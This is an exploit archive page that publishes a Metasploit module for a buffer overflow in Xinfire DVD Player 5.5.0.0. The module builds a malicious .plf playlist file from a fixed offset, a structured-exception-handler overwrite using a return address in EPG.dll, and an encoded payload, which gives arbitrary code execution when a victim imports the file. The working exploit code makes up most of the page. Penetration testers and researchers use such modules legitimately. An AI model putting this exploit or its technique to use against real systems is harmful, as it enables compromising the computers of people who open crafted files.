exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Xinfire DVD Player 5.5.0.0 Buffer Overflow

Xinfire DVD Player 5.5.0.0 Buffer Overflow
Posted Apr 20, 2020
Authored by metacom | Site metasploit.com

This Metasploit module exploits a buffer overflow in Xinfire DVD Player Pro and Standard version 5.5.0.0. When the application is used to import a specially crafted plf file, a buffer overflow occurs allowing arbitrary code execution. Tested successfully on Win7, Win10. This software is similar as DVD X Player and BlazeDVD.

tags | exploit, overflow, arbitrary, code execution
SHA-256 | 8e1432aa8dfb148fc7ae4a9837d2ea55ca221408cff178051aabf9226be0a5aa

Xinfire DVD Player 5.5.0.0 Buffer Overflow

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'Xinfire DVD Player Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Xinfire DVD Player Pro and Standard v5.5.0.0.When
the application is used to import a specially crafted plf file, a buffer overflow occurs
allowing arbitrary code execution.Tested successfully on Win7, Win10.This software is similar as DVD X Player and BlazeDVD.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom' # MSF Module and Vulnerability discovery
],
'References' =>
[
[ 'OSVDB', '' ],
[ 'EDB', '' ],
[ 'EDB', '' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00\x0a\x0d\x1a\x20",
'Space' => 1000,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x6160174F, 'Offset' => 608 } ], # p/p/r EPG.dll
],
'Privileged' => false,
'DisclosureDate' => 'Apr 15 2020',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
])

end

def exploit

buffer = rand_text(target['Offset']) #junk
buffer << generate_seh_record(target.ret)
buffer << payload.encoded # 1000 bytes of space
# more junk may be needed to trigger the exception

file_create(buffer)

end
end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close